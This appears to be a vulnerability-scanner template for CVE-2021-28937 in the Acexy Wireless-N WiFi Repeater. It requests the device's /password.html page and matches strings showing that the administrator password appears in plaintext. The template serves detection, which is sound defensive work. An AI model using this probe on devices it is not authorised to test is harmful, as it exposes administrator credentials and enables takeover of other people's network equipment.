id: CVE-2021-28937 info: name: Acexy Wireless-N WiFi Repeater Password Disclosure author: geeknik description: The password.html page of the Web management interface of the Acexy Wireless-N WiFi Repeater REV 1.0 contains the administrator account password in plaintext. reference: https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 severity: medium tags: cve,cve2021,acexy,disclosure,iot requests: - method: GET path: - "{{BaseURL}}/password.html" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "Password Setting" - "addCfg('username'" - "addCfg('newpass'" condition: and